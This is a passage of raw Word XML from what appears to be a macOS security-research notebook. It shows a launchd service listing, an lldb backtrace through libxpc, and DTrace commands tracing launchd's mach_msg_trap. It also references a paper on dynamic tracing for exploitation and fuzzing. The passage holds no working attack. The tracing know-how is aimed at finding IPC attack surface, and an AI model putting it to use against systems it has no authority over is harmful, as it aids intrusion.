agedClient.cloudconfiguration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OBluetoothUSBDFU</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dynamic_pag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mio.IIDCVideoAssistan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udi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realvnc.vncserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.adobe.SC.FPFeedbackService-1.0</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ecurity.syspolic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CIELaneConfigToo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ocsp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GameController.gamecontroller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oracle.java.Helper-Too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mb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umpGPURestart</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csrutil.report</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ecurity.authhost.00000000-0000-0000-0000-0000000186A8</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okit.ioserviceauthorize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org.postfix.newaliases</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csi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essionlogou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kunc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Kerberos.kcm</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Kerberos.kadmin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corecapture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openssh.ssh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oreaccountd.daemon</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oftwareupdatecheck.initia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preferences.timezone.auto</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periodic-daily</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OAccelMemoryInfoCollector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.bsd.dir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mio.AVCAssistan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alf</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FBEventHelp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srpc.srvsvc</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msrpc.lsarpc</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efilogin-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spluginhelper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mio.iOSScreenCaptureAssistan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taskgated-helper</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smb.preferences</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acoon</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srpc.netlog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findmymacd</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diskmanagement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bnep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cloudfamilyrestrictionsd</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IASUtilities.IASCloudConfigHelper</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Localization.SetDefaultsServic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unmountassistant.sysagent</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storeassetd.daemon</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eportPanicService</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RemotePairTool</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metadata.mds.scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.familycontrols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.dpaudiothru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.diagnostic.uuidpathd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nokia-lumia-820:~ root1$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00B65EF6" w:rsidP="00B65EF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="168" w:name="_Toc445313370"/>
      <w:r w:rsidR="00F416BD">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00F416BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ser mode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
      <w:r w:rsidR="00F416BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRPr="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="009F6926">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D25CD" w:rsidRDefault="005D25C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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/usr/lib/system/libxpc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D25CD" w:rsidRDefault="005D25C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999999"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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999999"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F416BD">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D25CD" w:rsidRPr="00F416BD" w:rsidRDefault="005D25C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thread #1: tid = 0x90e3, 0x00007fff93d490a0 libsystem_kernel.dylib`mach_msg, queue = 'com.apple.main-thread', stop reason = breakpoint 2.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 frame #0: 0x00007fff93d490a0 libsystem_kernel.dylib`mach_msg</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 0x00007fff8af67dd4 libdispatch.dylib`_dispatch_mach_msg_send + 1149</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 0x00007fff8af67894 libdispatch.dylib`dispatch_mach_send + 26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3: 0x00007fff8a0f70ab libxpc.dylib`_xpc_connection_send_message_with_reply_f + 13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4: 0x00007fff8a0f6fb2 libxpc.dylib`xpc_connection_send_message_with_reply_sync + 203</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5: 0x00007fff87a0323e login`LFClientSendArgumentsAndGetReply + 299</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6: 0x00007fff87a030db login`LFClientSendArgumentsAndGetCFReply + 3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7: 0x00007fff879fd4c7 login`SACShieldWindowShowing + 184</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8: 0x00007fff9ae76336 SocialAppsCore`___lldb_unnamed_function36$$SocialAppsCore + 77</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9: 0x000000010f52712d FaceTime`___lldb_unnamed_function1060$$FaceTime + 40</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0: 0x000000010f565301 FaceTime`___lldb_unnamed_function2162$$FaceTime + 4603</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1: 0x000000010f5278cd FaceTime`___lldb_unnamed_function1074$$FaceTime + 159</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2: 0x00007fff90fcfb5c CoreFoundation`__invoking___ + 140</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3: 0x00007fff90fcf9ee CoreFoundation`-[NSInvocation invoke] + 286</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4: 0x00007fff8e0f1220 Foundation`__NSFireTimer + 95</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5: 0x00007fff90fdbc84 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ + 20</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6: 0x00007fff90fdb913 CoreFoundation`__CFRunLoopDoTimer + 1075</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7: 0x00007fff90fdb46a CoreFoundation`__CFRunLoopDoTimers + 298</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8: 0x00007fff90fd2961 CoreFoundation`__CFRunLoopRun + 184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19: 0x00007fff90fd1fc8 CoreFoundation`CFRunLoopRunSpecific + 296</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0: 0x00007fff90be2d55 HIToolbox`RunCurrentEventLoopInMode + 235</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1: 0x00007fff90be2b8f HIToolbox`ReceiveNextEventCommon + 43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2: 0x00007fff90be29cf HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 7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3: 0x00007fff96697d96 AppKit`_DPSNextEvent + 1067</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4: 0x00007fff966971c5 AppKit`-[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] + 454</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5: 0x00007fff9668bd28 AppKit`-[NSApplication run] + 682</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6: 0x00007fff96654fbe AppKit`NSApplicationMain + 1176</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #27: 0x00007fff94cf85ad libdyld.dylib`start + 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000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #28: 0x00007fff94cf85ad libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRPr="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F41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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416BD">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE2CC5" w:rsidRDefault="00DE2CC5" w:rsidP="00B65EF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc445313371"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kernel  mode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6CBC" w:rsidRDefault="009D6CBC" w:rsidP="009D6CBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc445313372"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dtrace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6CBC" w:rsidRPr="006D0E0F" w:rsidRDefault="009D6CBC" w:rsidP="009D6CBC"/>
    <w:p w:rsidR="009D6CBC" w:rsidRDefault="009D6CBC" w:rsidP="009D6CBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc445313373"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904EAC" w:rsidRDefault="004106D2" w:rsidP="00904EAC">
      <w:hyperlink r:id="rId107" w:history="1">
        <w:r w:rsidR="00904EAC" w:rsidRPr="00511064">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.brendangregg.com/dtrace.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FB76FF" w:rsidRDefault="00FB76FF" w:rsidP="00904EAC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18106F2B" wp14:editId="61230F1C">
            <wp:extent cx="5274310" cy="39058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905885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB76FF" w:rsidRDefault="00FB76FF" w:rsidP="00904EAC">
      <w:r w:rsidRPr="00FB76FF">
        <w:t>Dynamic-Tracing-for-Exploitation-and-Fuzzing-final.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB76FF" w:rsidRDefault="00FB76FF" w:rsidP="00904EAC"/>
    <w:p w:rsidR="00904EAC" w:rsidRDefault="00904EAC" w:rsidP="00904EAC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DTraceToolkit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904EAC" w:rsidRDefault="003C5B86" w:rsidP="00904EAC">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">trace </w:t>
      </w:r>
      <w:r w:rsidR="008D45E0">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D45E0" w:rsidRPr="00904EAC" w:rsidRDefault="008D45E0" w:rsidP="00904EAC">
      <w:r>
        <w:t>Dtrace –w –s xxx.d</w:t>
      </w:r>
      <w:r w:rsidR="00D02325">
        <w:t xml:space="preserve"> (Enable destructive mode)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007030CF" w:rsidRDefault="007030CF" w:rsidP="007030CF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>dapptrace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F698C" w:rsidRDefault="001A2F54" w:rsidP="008F698C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ltrace equipment, trace user and library function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A2F54" w:rsidRPr="008F698C" w:rsidRDefault="001A2F54" w:rsidP="008F698C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dapptrace –u libxpc –p xxxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007030CF" w:rsidRDefault="007030CF" w:rsidP="007030CF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>dstruss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007030CF" w:rsidRPr="007030CF" w:rsidRDefault="001A2F54" w:rsidP="007030CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system call trace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Toc445313374"/>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>trace-launchd-mach_msg_trap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t>sh-3.2# dtrace -n 'pid$target::mach_msg_trap:entry {@[ustack()]= count();}' -p 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t>dtrace: description 'pid$target::mach_msg_trap:entry ' matched 2 probes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t>^C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07"/>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07"/>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_kernel.dylib`mach_msg_trap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_kernel.dylib`mach_msg+0x37</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_kernel.dylib`_kernelrpc_mach_port_get_attributes+0x8a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aebfea3+0x30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aed4326+0x25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aecfecc+0x4d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aedd029+0x169</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aedefc6+0xf0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aee2173+0x4db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aee2701+0x2d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libxpc.dylib`_xpc_dictionary_apply_f_apply+0x29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libxpc.dylib`_xpc_dictionary_apply_node_f+0x5f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libxpc.dylib`xpc_dictionary_apply_f+0x24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aee0ee5+0x7a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_client_callout+0x8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_queue_drain+0x2f2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_queue_invoke+0x225</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_root_queue_drain+0x21a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_worker_thread3+0x5b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_pthread.dylib`_pthread_wqthread+0x469</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07"/>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_kernel.dylib`mach_msg_trap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_kernel.dylib`mach_msg+0x37</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_kernel.dylib`_kernelrpc_mach_port_request_notification+0x78</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aebfefa+0x35</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aeec971+0x16d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aeed91c+0x4c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aed5b11+0xb6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aed75bf+0x548</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aeeced1+0x164</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              launchd`0x000000010aeed3eb+0x8d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_client_callout+0x8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_source_latch_and_call+0x8bb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_source_invoke+0x3d7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_queue_drain+0x4b7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_queue_invoke+0x225</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_root_queue_drain+0x21a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libdispatch.dylib`_dispatch_worker_thread3+0x5b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_pthread.dylib`_pthread_wqthread+0x469</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23B07" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">              libsystem_pthread.dylib`start_wqthread+0xd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00C23B07" w:rsidP="00C23B07">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B36DE" w:rsidRDefault="006B36DE" w:rsidP="00C23B07"/>
    <w:p w:rsidR="006B36DE" w:rsidRDefault="006B36DE" w:rsidP="00C23B07"/>
    <w:p w:rsidR="006B36DE" w:rsidRDefault="007F2704" w:rsidP="006B36DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc445313375"/>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>octl()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w:rsidR="006B36DE" w:rsidRPr="006D0E0F" w:rsidRDefault="006B36DE" w:rsidP="006B36DE"/>
